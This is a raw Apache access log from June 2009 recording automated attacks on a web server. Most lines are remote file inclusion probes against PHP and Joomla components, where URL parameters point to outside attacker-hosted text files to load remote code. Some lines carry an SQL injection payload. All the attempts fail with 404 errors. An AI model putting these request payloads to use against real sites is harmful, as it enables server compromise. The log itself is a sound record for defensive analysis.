209.59.12.99 - - [21/Jun/2009:00:03:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [21/Jun/2009:00:03:49 -0400] "GET /logs/access_log.Q109050800%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:00:05:17 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.49.99.7 - - [21/Jun/2009:00:07:29 -0400] "GET /logs/access_log.Q109052900%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:00:07:42 -0400] "GET /index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:00:07:42 -0400] "GET /logs/access_log.Q109052200/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [21/Jun/2009:00:07:45 -0400] "GET /logs/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:08:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.189.2.38 - - [21/Jun/2009:00:09:13 -0400] "GET /logs/access_log.Q109050700/index1.php?op=http://www.chfeel.com/chfeel/bbs/id1.txt??%20? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:00:10:49 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:00:10:49 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:00:10:49 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:00:11:18 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:13:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:00:15:10 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
12.158.191.112 - - [21/Jun/2009:00:15:20 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
12.158.191.112 - - [21/Jun/2009:00:15:20 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
12.158.191.112 - - [21/Jun/2009:00:15:20 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
12.158.191.112 - - [21/Jun/2009:00:15:31 -0400] "GET /logs/access_log.Q109060800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:00:15:50 -0400] "GET /images/nav_store_search_grn.jpg HTTP/1.1" 200 1440 "-" "Googlebot-Image/1.0"
65.96.104.30 - - [21/Jun/2009:00:16:31 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:00:16:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:00:16:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
65.96.104.30 - - [21/Jun/2009:00:16:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
12.158.191.112 - - [21/Jun/2009:00:17:04 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
12.158.191.112 - - [21/Jun/2009:00:17:25 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:18:11 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:18:11 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:18:11 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:18:21 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:18:21 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:18:21 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:18:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [21/Jun/2009:00:18:55 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:19:30 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.212.27.242 - - [21/Jun/2009:00:20:00 -0400] "GET /logs//index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20se%E7in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* HTTP/1.1" 404 213 "-" "libwww-perl/5.818"
66.212.27.242 - - [21/Jun/2009:00:20:00 -0400] "GET /logs/error_log.Q109061100%20//index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20se%E7in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* HTTP/1.1" 404 235 "-" "libwww-perl/5.818"
66.212.27.242 - - [21/Jun/2009:00:20:00 -0400] "GET //index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20se%E7in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* HTTP/1.1" 404 208 "-" "libwww-perl/5.818"
201.232.54.48 - - [21/Jun/2009:00:20:26 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:00:20:32 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:00:20:33 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:00:20:33 -0400] "GET /logs/access_log.Q109052000%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:00:20:33 -0400] "GET /logs/access_log.Q109051500%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:20:40 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.212.27.242 - - [21/Jun/2009:00:20:56 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20se%E7in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* HTTP/1.1" 404 235 "-" "libwww-perl/5.818"
63.147.72.145 - - [21/Jun/2009:00:21:11 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:21:11 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:21:11 -0400] "GET /logs/access_log.Q109052000%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:21:14 -0400] "GET /logs/access_log.Q109051500%20%20/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:21:17 -0400] "GET /logs/access_log.Q109053000/convert/mvcw.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:21:18 -0400] "GET /logs/access_log.Q109060800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.212.27.242 - - [21/Jun/2009:00:21:27 -0400] "GET /logs/error_log.Q109061100//index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20se%E7in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* HTTP/1.1" 404 234 "-" "libwww-perl/5.818"
201.232.54.48 - - [21/Jun/2009:00:22:55 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:00:22:58 -0400] "GET /logs/access_log.Q109052000/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.11.230.36 - - [21/Jun/2009:00:23:00 -0400] "GET /logs/access_log.Q109051200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:00:23:27 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:00:23:27 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:00:23:28 -0400] "GET /logs/access_log.Q109052000/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
124.138.156.3 - - [21/Jun/2009:00:23:35 -0400] "GET /logs/access_log.Q109051200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
201.232.54.48 - - [21/Jun/2009:00:23:37 -0400] "GET /logs/access_log.Q109060800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://aboutav.com//id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:23:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [21/Jun/2009:00:23:42 -0400] "GET /logs/access_log.Q109052900//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.94.80.27 - - [21/Jun/2009:00:26:23 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:00:26:23 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:00:26:23 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:00:26:24 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:00:26:24 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
69.94.80.27 - - [21/Jun/2009:00:26:24 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
72.30.81.156 - - [21/Jun/2009:00:26:57 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.156 - - [21/Jun/2009:00:26:57 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.11.230.36 - - [21/Jun/2009:00:27:46 -0400] "GET /logs/access_log.Q109061400/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:27:49 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:27:49 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:27:49 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:27:59 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:27:59 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:28:00 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:28:04 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:28:04 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:28:04 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:28:09 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:28:14 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:28:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.142.249 - - [21/Jun/2009:00:28:57 -0400] "GET /logs/access_log.Q109060100/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:29:59 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:30:00 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.6.17.151 - - [21/Jun/2009:00:30:01 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.17.99.13 - - [21/Jun/2009:00:30:04 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:00:30:05 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:31:15 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:31:15 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:31:15 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:00:32:24 -0400] "GET /logs/access_log.Q109060100/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:33:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.147.72.145 - - [21/Jun/2009:00:33:46 -0400] "GET /logs/access_log.Q109052000/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:33:47 -0400] "GET /logs/access_log.Q109051200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
63.147.72.145 - - [21/Jun/2009:00:35:14 -0400] "GET /logs/access_log.Q109061400/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:00:38:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.151 - - [21/Jun/2009:00:39:37 -0400] "GET /logs/error_log.Q109050800 HTTP/1.0" 200 4417879 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.106.147 - - [21/Jun/2009:00:39:58 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.6.17.151 - - [21/Jun/2009:00:39:41 -0400] "GET /logs/error_log.Q109050800 HTTP/1.0" 200 4417879 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.252.92 - - [21/Jun/2009:00:40:07 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:40:07 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:40:07 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:40:11 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:40:11 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:40:11 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:41:45 -0400] "GET /logs/error_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:00:41:53 -0400] "GET /logs/error_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [21/Jun/2009:00:43:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [21/Jun/2009:00:44:38 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.71.54 - - [21/Jun/2009:00:44:38 -0400] "GET /images/over-index5_fractred.jpg HTTP/1.1" 200 2810 "-" "Googlebot-Image/1.0"
218.246.20.221 - - [21/Jun/2009:00:45:21 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.246.20.221 - - [21/Jun/2009:00:45:22 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.55.106.147 - - [21/Jun/2009:00:48:17 -0400] "GET /logs/access_log.Q107073000 HTTP/1.1" 404 224 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
